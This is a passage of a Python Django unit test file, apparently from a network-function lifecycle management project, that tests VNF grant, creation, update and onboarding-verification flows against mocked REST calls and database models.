self.vnf_inst_id = str(uuid.uuid4())
self.data = {
"vnfInstanceId": self.vnf_inst_id,
"vnfLcmOpOccId": "vnf_lcm_op_occ_id",
"addResources": [{"vdu": "vdu_grant_vnf_add_resources"}],
"operation": "INSTANTIATE"
}
self.client = Client()
vdu_info_dict = [{"vduName": "vg", "flavorName": "flavor_1", "flavorId": "flavor_id_001", "directive": []}]
OOFDataModel(request_id="request_id_001", transaction_id="transaction_id_001", request_status="done",
request_module_name="vg", service_resource_id=self.vnf_inst_id, vim_id="cloudOwner_casa",
cloud_owner="cloudOwner", cloud_region_id="casa", vdu_info=json.dumps(vdu_info_dict)).save()
NfInstModel(mnfinstid=self.vnf_inst_id, nfinstid="vnf_inst_id_001", package_id="package_id_001",
vnfm_inst_id="vnfm_id_001").save()
def tearDown(self):
OOFDataModel.objects.all().delete()
NfInstModel.objects.all().delete()
@mock.patch.object(grant_vnf, "vim_connections_get")
def test_vnf_grant_view(self, mock_grant):
resmgr_grant_resp = {
"vim": {
"vimId": "cloudOwner_casa",
"accessInfo": {
"tenant": "tenantA"
}
}
}
mock_grant.return_value = resmgr_grant_resp
self.data.pop("addResources")
response = self.client.post("/api/nslcm/v2/grants", data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data["vimAssets"]["computeResourceFlavours"][0]["vimConnectionId"], "cloudOwner_casa")
self.assertEqual(response.data["vimAssets"]["computeResourceFlavours"][0]["resourceProviderId"], "vg")
self.assertEqual(response.data["vimAssets"]["computeResourceFlavours"][0]["vimFlavourId"], "flavor_id_001")
@mock.patch.object(restcall, "call_req")
@mock.patch.object(grant_vnf, "vim_connections_get")
def test_exec_grant_when_add_resources_success(self, mock_grant, mock_call_req):
mock_vals = {
"/api/catalog/v1/vnfpackages/package_id_001":
[0, json.JSONEncoder().encode(nf_package_info), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
resmgr_grant_resp = {
"vim": {
"vimId": "cloudOwner_casa",
"accessInfo": {
"tenant": "tenantA"
}
}
}
mock_grant.return_value = resmgr_grant_resp
resp = GrantVnf(json.dumps(self.data)).exec_grant()
self.assertEqual(resp["vimAssets"]["computeResourceFlavours"][0]["vimConnectionId"], "cloudOwner_casa")
self.assertEqual(resp["vimAssets"]["computeResourceFlavours"][0]["resourceProviderId"], "vg")
self.assertEqual(resp["vimAssets"]["computeResourceFlavours"][0]["vimFlavourId"], "flavor_id_001")
def test_exec_grant_when_add_resources_but_no_vnfinst(self):
self.data["vnfInstanceId"] = "no_vnfinst"
resp = None
try:
resp = GrantVnf(json.dumps(self.data)).exec_grant()
except NSLCMException as e:
self.assertEqual(type(e), NSLCMException)
finally:
self.assertEqual(resp, None)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
@mock.patch.object(grant_vnf, "vim_connections_get")
def test_exec_grant_when_add_resources_but_no_off(self, mock_grant, mock_call_req, mock_sleep):
NfInstModel(mnfinstid="add_resources_but_no_off", nfinstid="vnf_inst_id_002",
package_id="package_id_002").save()
mock_sleep.return_value = None
mock_vals = {
"/api/catalog/v1/vnfpackages/package_id_002":
[0, json.JSONEncoder().encode(nf_package_info), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
resmgr_grant_resp = {
"vim": {
"vimId": "cloudOwner_casa",
"accessInfo": {
"tenant": "tenantA"
}
}
}
mock_grant.return_value = resmgr_grant_resp
self.data["vnfInstanceId"] = "add_resources_but_no_off"
resp = GrantVnf(json.dumps(self.data)).exec_grant()
self.assertEqual(resp["vnfInstanceId"], "add_resources_but_no_off")
self.assertEqual(resp["vnfLcmOpOccId"], "vnf_lcm_op_occ_id")
vimConnections = [{
"id": "cloudOwner_casa",
"vimId": "cloudOwner_casa",
"vimType": None,
"interfaceInfo": None,
"accessInfo": {"tenant": "tenantA"},
"extra": None
}]
self.assertEqual(resp["vimConnections"], vimConnections)
@mock.patch.object(grant_vnf, "vim_connections_get")
def test_exec_grant_when_resource_template_in_add_resources(self, mock_grant):
resmgr_grant_resp = {
"vim": {
"vimId": "cloudOwner_casa",
"accessInfo": {
"tenant": "tenantA"
}
}
}
mock_grant.return_value = resmgr_grant_resp
self.data["addResources"] = [{"vdu": "vdu_grant_vnf_add_resources"}, "resourceTemplate"]
resp = GrantVnf(json.dumps(self.data)).exec_grant()
self.assertEqual(resp["vimAssets"]["computeResourceFlavours"][0]["vimConnectionId"], "cloudOwner_casa")
self.assertEqual(resp["vimAssets"]["computeResourceFlavours"][0]["resourceProviderId"], "vg")
self.assertEqual(resp["vimAssets"]["computeResourceFlavours"][0]["vimFlavourId"], "flavor_id_001")
@mock.patch.object(restcall, "call_req")
@mock.patch.object(grant_vnf, "vim_connections_get")
def test_exec_grant_when_remove_resources_success(self, mock_grant, mock_call_req):
mock_vals = {
"/api/catalog/v1/vnfpackages/package_id_001":
[0, json.JSONEncoder().encode(nf_package_info), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
resmgr_grant_resp = {
"vim": {
"vimId": "cloudOwner_casa",
"accessInfo": {
"tenant": "tenantA"
}
}
}
mock_grant.return_value = resmgr_grant_resp
self.data.pop("addResources")
self.data["removeResources"] = [{"vdu": "vdu_grant_vnf_remove_resources"}]
self.data["additionalparams"] = {"vnfmid": "vnfm_id_001"}
resp = GrantVnf(json.dumps(self.data)).exec_grant()
self.assertEqual(resp["vimAssets"]["computeResourceFlavours"][0]["vimConnectionId"], "cloudOwner_casa")
self.assertEqual(resp["vimAssets"]["computeResourceFlavours"][0]["resourceProviderId"], "vg")
self.assertEqual(resp["vimAssets"]["computeResourceFlavours"][0]["vimFlavourId"], "flavor_id_001")
def test_exec_grant_when_remove_resources_no_vnfinst(self):
self.data.pop("addResources")
self.data["removeResources"] = [{"vdu": "vdu_grant_vnf_remove_resources"}]
self.data["additionalparams"] = {"vnfmid": "vnfm_id_002"}
resp = None
try:
resp = GrantVnf(json.dumps(self.data)).exec_grant()
except NSLCMException as e:
self.assertEqual(type(e), NSLCMException)
finally:
self.assertEqual(resp, None)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
@mock.patch.object(grant_vnf, "vim_connections_get")
def test_exec_grant_when_remove_resources_but_no_off(self, mock_grant, mock_call_req, mock_sleep):
NfInstModel(mnfinstid="remove_resources_but_no_off", nfinstid="vnf_inst_id_002", package_id="package_id_002",
vnfm_inst_id="vnfm_id_002").save()
mock_sleep.return_value = None
mock_vals = {
"/api/catalog/v1/vnfpackages/package_id_002":
[0, json.JSONEncoder().encode(nf_package_info), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
resmgr_grant_resp = {
"vim": {
"vimId": "cloudOwner_casa",
"accessInfo": {
"tenant": "tenantA"
}
}
}
mock_grant.return_value = resmgr_grant_resp
self.data["vnfInstanceId"] = "remove_resources_but_no_off"
self.data.pop("addResources")
self.data["removeResources"] = [{"vdu": "vdu_grant_vnf_remove_resources"}]
self.data["additionalparams"] = {"vnfmid": "vnfm_id_002"}
resp = GrantVnf(json.dumps(self.data)).exec_grant()
self.assertEqual(resp["vnfInstanceId"], "remove_resources_but_no_off")
self.assertEqual(resp["vnfLcmOpOccId"], "vnf_lcm_op_occ_id")
vimConnections = [{
"id": "cloudOwner_casa",
"vimId": "cloudOwner_casa",
"vimType": None,
"interfaceInfo": None,
"accessInfo": {"tenant": "tenantA"},
"extra": None
}]
self.assertEqual(resp["vimConnections"], vimConnections)
@mock.patch.object(grant_vnf, "vim_connections_get")
def test_exec_grant_when_resource_template_in_remove_resources(self, mock_grant):
resmgr_grant_resp = {
"vim": {
"vimId": "cloudOwner_casa",
"accessInfo": {
"tenant": "tenantA"
}
}
}
mock_grant.return_value = resmgr_grant_resp
self.data.pop("addResources")
self.data["removeResources"] = [{"vdu": "vdu_grant_vnf_remove_resources"}, "resourceTemplate"]
resp = GrantVnf(json.dumps(self.data)).exec_grant()
self.assertEqual(resp["vimAssets"]["computeResourceFlavours"][0]["vimConnectionId"], "cloudOwner_casa")
self.assertEqual(resp["vimAssets"]["computeResourceFlavours"][0]["resourceProviderId"], "vg")
self.assertEqual(resp["vimAssets"]["computeResourceFlavours"][0]["vimFlavourId"], "flavor_id_001")
class TestCreateVnfViews(TestCase):
def setUp(self):
self.ns_inst_id = str(uuid.uuid4())
self.job_id = str(uuid.uuid4())
self.data = {
"vnfIndex": "1",
"nsInstanceId": self.ns_inst_id,
# "additionalParamForNs": {"inputs": json.dumps({})},
"additionalParamForVnf": [
{
"vnfprofileid": "VBras",
"additionalparam": {
"inputs": json.dumps({
"vnf_param1": "11",
"vnf_param2": "22"
}),
"vnfminstanceid": "1",
# "vimId": "zte_test",
"vimId": '{"cloud_owner": "VCPE", "cloud_regionid": "RegionOne"}'
}
}
]
}
self.client = Client()
NSInstModel(id=self.ns_inst_id, name="ns", nspackage_id="1", nsd_id="nsd_id", description="description",
status="instantiating", nsd_model=json.dumps(nsd_model_dict), create_time=now_time(),
lastuptime=now_time()).save()
VLInstModel(vldid="ext_mnet_network", ownertype=OWNER_TYPE.NS, ownerid=self.ns_inst_id,
vimid="{}").save()
def tearDown(self):
NfInstModel.objects.all().delete()
JobModel.objects.all().delete()
@mock.patch.object(CreateVnfs, "run")
def test_create_vnf_view(self, mock_run):
response = self.client.post("/api/nslcm/v1/ns/vnfs", data=self.data)
self.assertEqual(status.HTTP_202_ACCEPTED, response.status_code)
context = json.loads(response.content)
self.assertTrue(NfInstModel.objects.filter(nfinstid=context["vnfInstId"]).exists())
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_create_vnf_thread_sucess(self, mock_call_req, mock_sleep):
mock_sleep.return_value = None
nf_inst_id, job_id = create_vnfs.prepare_create_params()
mock_vals = {
"/api/catalog/v1/vnfpackages/zte_vbras":
[0, json.JSONEncoder().encode(nf_package_info), "200"],
"/external-system/esr-vnfm-list/esr-vnfm/1?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/1/vnfs":
[0, json.JSONEncoder().encode({"jobId": self.job_id, "vnfInstanceId": 3}), "200"],
"/api/oof/v1/placement":
[0, json.JSONEncoder().encode({}), "202"],
"/api/resmgr/v1/vnf":
[0, json.JSONEncoder().encode({}), "200"],
"/api/ztevnfmdriver/v1/1/jobs/" + self.job_id + "?responseId=0":
[0, json.JSONEncoder().encode({"jobid": self.job_id,
"responsedescriptor": {"progress": "100",
"status": JOB_MODEL_STATUS.FINISHED,
"responseid": "3",
"statusdescription": "creating",
"errorcode": "0",
"responsehistorylist": [
{"progress": "0",
"status": JOB_MODEL_STATUS.PROCESSING,
"responseid": "2",
"statusdescription": "creating",
"errorcode": "0"}]}}), "200"],
"api/gvnfmdriver/v1/1/subscriptions":
[0, json.JSONEncoder().encode(subscription_response_data), "200"],
"/api/resmgr/v1/vnfinfo":
[0, json.JSONEncoder().encode(subscription_response_data), "200"],
# "/network/generic-vnfs/generic-vnf/%s" % nf_inst_id:
# [0, json.JSONEncoder().encode({}), "201"],
# "/cloud-infrastructure/cloud-regions/cloud-region/zte/test?depth=all":
# [0, json.JSONEncoder().encode(vim_info), "201"],
# "/cloud-infrastructure/cloud-regions/cloud-region/zte/test/tenants/tenant/admin/vservers/vserver/1":
# [0, json.JSONEncoder().encode({}), "201"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
data = {
"ns_instance_id": ignore_case_get(self.data, "nsInstanceId"),
"additional_param_for_ns": ignore_case_get(self.data, "additionalParamForNs"),
"additional_param_for_vnf": ignore_case_get(self.data, "additionalParamForVnf"),
"vnf_index": ignore_case_get(self.data, "vnfIndex")
}
CreateVnfs(data, nf_inst_id, job_id).run()
self.assertEqual(NfInstModel.objects.get(nfinstid=nf_inst_id).status, VNF_STATUS.ACTIVE)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, JOB_PROGRESS.FINISHED)
def test_create_vnf_thread_when_the_name_of_vnf_instance_already_exists(self):
NfInstModel(nf_name="").save()
nf_inst_id, job_id = create_vnfs.prepare_create_params()
data = {
"ns_instance_id": ignore_case_get(self.data, "nsInstanceId"),
"additional_param_for_ns": ignore_case_get(self.data, "additionalParamForNs"),
"additional_param_for_vnf": ignore_case_get(self.data, "additionalParamForVnf"),
"vnf_index": ignore_case_get(self.data, "vnfIndex")
}
CreateVnfs(data, nf_inst_id, job_id).run()
self.assertEqual(NfInstModel.objects.get(nfinstid=nf_inst_id).status, VNF_STATUS.FAILED)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_create_vnf_thread_when_data_has_vnfd_id(self, mock_call_req, mock_sleep):
mock_sleep.return_value = None
nf_inst_id, job_id = create_vnfs.prepare_create_params()
mock_vals = {
"/api/catalog/v1/vnfpackages/data_has_vnfd_id":
[0, json.JSONEncoder().encode(nf_package_info), "200"],
"/external-system/esr-vnfm-list/esr-vnfm/1?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/1/vnfs":
[0, json.JSONEncoder().encode({"jobId": self.job_id, "vnfInstanceId": 3}), "200"],
"/api/oof/v1/placement":
[0, json.JSONEncoder().encode({}), "202"],
"/api/resmgr/v1/vnf":
[0, json.JSONEncoder().encode({}), "200"],
"/api/ztevnfmdriver/v1/1/jobs/" + self.job_id + "?responseId=0":
[0, json.JSONEncoder().encode({"jobid": self.job_id,
"responsedescriptor": {"progress": "100",
"status": JOB_MODEL_STATUS.FINISHED,
"responseid": "3",
"statusdescription": "creating",
"errorcode": "0",
"responsehistorylist": [
{"progress": "0",
"status": JOB_MODEL_STATUS.PROCESSING,
"responseid": "2",
"statusdescription": "creating",
"errorcode": "0"}]}}), "200"],
"api/gvnfmdriver/v1/1/subscriptions":
[0, json.JSONEncoder().encode({}), "200"],
"/api/resmgr/v1/vnfinfo":
[0, json.JSONEncoder().encode(subscription_response_data), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
self.data["additionalParamForVnf"][0]["additionalparam"]["vnfdId"] = "data_has_vnfd_id"
data = {
"ns_instance_id": ignore_case_get(self.data, "nsInstanceId"),
"additional_param_for_ns": ignore_case_get(self.data, "additionalParamForNs"),
"additional_param_for_vnf": ignore_case_get(self.data, "additionalParamForVnf"),
"vnf_index": ignore_case_get(self.data, "vnfIndex")
}
CreateVnfs(data, nf_inst_id, job_id).run()
self.assertEqual(NfInstModel.objects.get(nfinstid=nf_inst_id).status, VNF_STATUS.ACTIVE)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, JOB_PROGRESS.FINISHED)
@mock.patch.object(restcall, "call_req")
@mock.patch.object(CreateVnfs, "build_homing_request")
def test_send_homing_request(self, mock_build_req, mock_call_req):
nf_inst_id, job_id = create_vnfs.prepare_create_params()
OOFDataModel.objects.all().delete()
resp = {
"requestId": "1234",
"transactionId": "1234",
"requestStatus": "accepted"
}
mock_build_req.return_value = {
"requestInfo": {
"transactionId": "1234",
"requestId": "1234",
"callbackUrl": "xx",
"sourceId": "vfc",
"requestType": "create",
"numSolutions": 1,
"optimizers": ["placement"],
"timeout": 600
},
"placementInfo": {
"placementDemands": [
{
"resourceModuleName": "vG",
"serviceResourceId": "1234",
"resourceModelInfo": {
"modelInvariantId": "1234",
"modelVersionId": "1234"
}
}
]
},
"serviceInfo": {
"serviceInstanceId": "1234",
"serviceName": "1234",
"modelInfo": {
"modelInvariantId": "5678",
"modelVersionId": "7890"
}
}
}
mock_call_req.return_value = [0, json.JSONEncoder().encode(resp), "202"]
data = {
"ns_instance_id": ignore_case_get(self.data, "nsInstanceId"),
"additional_param_for_ns": ignore_case_get(self.data, "additionalParamForNs"),
"additional_param_for_vnf": ignore_case_get(self.data, "additionalParamForVnf"),
"vnf_index": ignore_case_get(self.data, "vnfIndex")
}
CreateVnfs(data, nf_inst_id, job_id).send_homing_request_to_OOF()
ret = OOFDataModel.objects.filter(request_id="1234", transaction_id="1234")
self.assertIsNotNone(ret)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_create_vnf_thread_sucess_when_failed_to_subscribe_from_vnfm(self, mock_call_req, mock_sleep):
mock_sleep.return_value = None
nf_inst_id, job_id = create_vnfs.prepare_create_params()
mock_vals = {
"/api/catalog/v1/vnfpackages/zte_vbras":
[0, json.JSONEncoder().encode(nf_package_info), "200"],
"/external-system/esr-vnfm-list/esr-vnfm/1?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/1/vnfs":
[0, json.JSONEncoder().encode({"jobId": self.job_id, "vnfInstanceId": 3}), "200"],
"/api/oof/v1/placement":
[0, json.JSONEncoder().encode({}), "202"],
"/api/resmgr/v1/vnf":
[0, json.JSONEncoder().encode({}), "200"],
"/api/ztevnfmdriver/v1/1/jobs/" + self.job_id + "?responseId=0":
[0, json.JSONEncoder().encode({"jobid": self.job_id,
"responsedescriptor": {"progress": "100",
"status": JOB_MODEL_STATUS.FINISHED,
"responseid": "3",
"statusdescription": "creating",
"errorcode": "0",
"responsehistorylist": [
{"progress": "0",
"status": JOB_MODEL_STATUS.PROCESSING,
"responseid": "2",
"statusdescription": "creating",
"errorcode": "0"}]}}), "200"],
"api/gvnfmdriver/v1/1/subscriptions":
[1, json.JSONEncoder().encode(subscription_response_data), "200"],
"/api/resmgr/v1/vnfinfo":
[0, json.JSONEncoder().encode(subscription_response_data), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
data = {
"ns_instance_id": ignore_case_get(self.data, "nsInstanceId"),
"additional_param_for_ns": ignore_case_get(self.data, "additionalParamForNs"),
"additional_param_for_vnf": ignore_case_get(self.data, "additionalParamForVnf"),
"vnf_index": ignore_case_get(self.data, "vnfIndex")
}
CreateVnfs(data, nf_inst_id, job_id).run()
self.assertEqual(NfInstModel.objects.get(nfinstid=nf_inst_id).status, VNF_STATUS.ACTIVE)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, JOB_PROGRESS.FINISHED)
class TestUpdateVnfsViews(TestCase):
def setUp(self):
self.client = Client()
self.data = {
"terminationType": "forceful",
"gracefulTerminationTimeout": "600",
"additionalParams": ""
}
self.nf_inst_id = "test_update_vnf"
self.m_nf_inst_id = "test_update_vnf_m_nf_inst_id"
self.vnfm_inst_id = "test_update_vnf_vnfm_inst_id"
self.vnfd_model = {"metadata": {"vnfdId": "1"}}
NfInstModel.objects.all().delete()
NfInstModel.objects.create(nfinstid=self.nf_inst_id,
vnfm_inst_id=self.vnfm_inst_id,
status=VNF_STATUS.NULL,
mnfinstid=self.m_nf_inst_id,
vnfd_model=self.vnfd_model
)
def tearDown(self):
NfInstModel.objects.all().delete()
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_update_vnf_thread(self, mock_call_req, mock_sleep):
vnf_update_service = NFOperateService(self.nf_inst_id, self.data)
job_info = {
"jobId": vnf_update_service.job_id,
"responsedescriptor": {"status": JOB_MODEL_STATUS.FINISHED}
}
mock_vals = {
"/external-system/esr-vnfm-list/esr-vnfm/test_update_vnf_vnfm_inst_id?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/test_update_vnf_vnfm_inst_id/vnfs/test_update_vnf_m_nf_inst_id/operate":
[0, json.JSONEncoder().encode({"jobId": vnf_update_service.job_id}), "200"],
"/api/ztevnfmdriver/v1/test_update_vnf_vnfm_inst_id/jobs/" + vnf_update_service.job_id + "?responseId=0":
[0, json.JSONEncoder().encode(job_info), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
vnf_update_service.run()
nfinst = NfInstModel.objects.get(nfinstid=self.nf_inst_id)
self.assertEqual(nfinst.status, VNF_STATUS.ACTIVE)
self.assertEqual(JobModel.objects.get(jobid=vnf_update_service.job_id).progress, JOB_PROGRESS.FINISHED)
def test_update_vnf_thread_when_no_nf(self):
NfInstModel.objects.all().delete()
vnf_update_service = NFOperateService(self.nf_inst_id, self.data)
vnf_update_service.run()
self.assertEqual(JobModel.objects.get(jobid=vnf_update_service.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_update_vnf_thread_when_nf_update_failed(self, mock_call_req, mock_sleep):
vnf_update_service = NFOperateService(self.nf_inst_id, self.data)
job_info = {
"jobId": vnf_update_service.job_id,
"responsedescriptor": {"status": JOB_MODEL_STATUS.ERROR}
}
mock_vals = {
"/external-system/esr-vnfm-list/esr-vnfm/test_update_vnf_vnfm_inst_id?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/test_update_vnf_vnfm_inst_id/vnfs/test_update_vnf_m_nf_inst_id/operate":
[0, json.JSONEncoder().encode({"jobId": vnf_update_service.job_id}), "200"],
"/api/ztevnfmdriver/v1/test_update_vnf_vnfm_inst_id/jobs/" + vnf_update_service.job_id + "?responseId=0":
[0, json.JSONEncoder().encode(job_info), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
vnf_update_service.run()
nfinst = NfInstModel.objects.get(nfinstid=self.nf_inst_id)
self.assertEqual(nfinst.status, VNF_STATUS.UPDATING)
self.assertEqual(JobModel.objects.get(jobid=vnf_update_service.job_id).progress, JOB_PROGRESS.ERROR)
class TestVerifyVnfsViews(TestCase):
def setUp(self):
self.client = Client()
self.url = "/api/nslcm/v1/vnfonboarding"
self.package_id = "test_verify_vnfs_package_id"
self.nf_inst_id = "test_verify_vnfs"
self.m_nf_inst_id = "test_verify_vnfs_m_nf_inst_id"
self.vnfm_inst_id = "test_verify_vnfs_vnfm_inst_id"
self.vnfd_model = {"metadata": {"vnfdId": "1"}}
self.data = {
"PackageID": self.package_id,
}
self.job_id = JobUtil.create_job(JOB_TYPE.VNF, "verify_vnfs", self.nf_inst_id)
NfInstModel.objects.all().delete()
NfInstModel.objects.create(package_id=self.package_id,
nfinstid=self.nf_inst_id,
vnfm_inst_id=self.vnfm_inst_id,
status=VNF_STATUS.NULL,
mnfinstid=self.m_nf_inst_id,
vnfd_model=self.vnfd_model
)
def tearDown(self):
NfInstModel.objects.all().delete()
@mock.patch.object(VerifyVnfs, "run")
def test_verify_vnfs_view(self, mock_run):
response = self.client.post(self.url, data=self.data)
self.assertEqual(status.HTTP_202_ACCEPTED, response.status_code)
def test_verify_vnfs_view_when_data_is_not_valid(self):
response = self.client.post(self.url, data={})
self.assertEqual(status.HTTP_409_CONFLICT, response.status_code)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_2 = {
"jobId": "test_2",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_task = {
"jobId": "task_id",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/ns/ns_vnfs":
[0, json.JSONEncoder().encode({"jobId": "test_2", "vnfInstId": ""}), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_2", 0):
[0, json.JSONEncoder().encode(job_info_2), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s?responseId=%s" % ("task_id", 0):
[0, json.JSONEncoder().encode(job_info_task), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s/result" % "task_id":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.FINISHED)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_failed_to_call_vnf_onboarding(self, mock_call_req, mock_sleep):
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[1, json.JSONEncoder().encode({}), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_on_boarding_failed_to_query_job(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[1, json.JSONEncoder().encode(job_info_1), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_on_boarding_job_does_not_exist(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_on_boarding_job_process_error(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": JOB_PROGRESS.ERROR,
"responseId": 1,
"statusDescription": "already onBoarded"
}
}
job_info_2 = {
"jobId": "test_2",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_task = {
"jobId": "task_id",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/ns/ns_vnfs":
[0, json.JSONEncoder().encode({"jobId": "test_2", "vnfInstId": ""}), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_2", 0):
[0, json.JSONEncoder().encode(job_info_2), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s?responseId=%s" % ("task_id", 0):
[0, json.JSONEncoder().encode(job_info_task), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s/result" % "task_id":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.FINISHED)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_failed_to_call_inst_vnf(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/ns/ns_vnfs":
[1, json.JSONEncoder().encode({"jobId": "test_2", "vnfInstId": ""}), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_term_vnf_job_process_error(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_2 = {
"jobId": "test_2",
"responseDescriptor": {
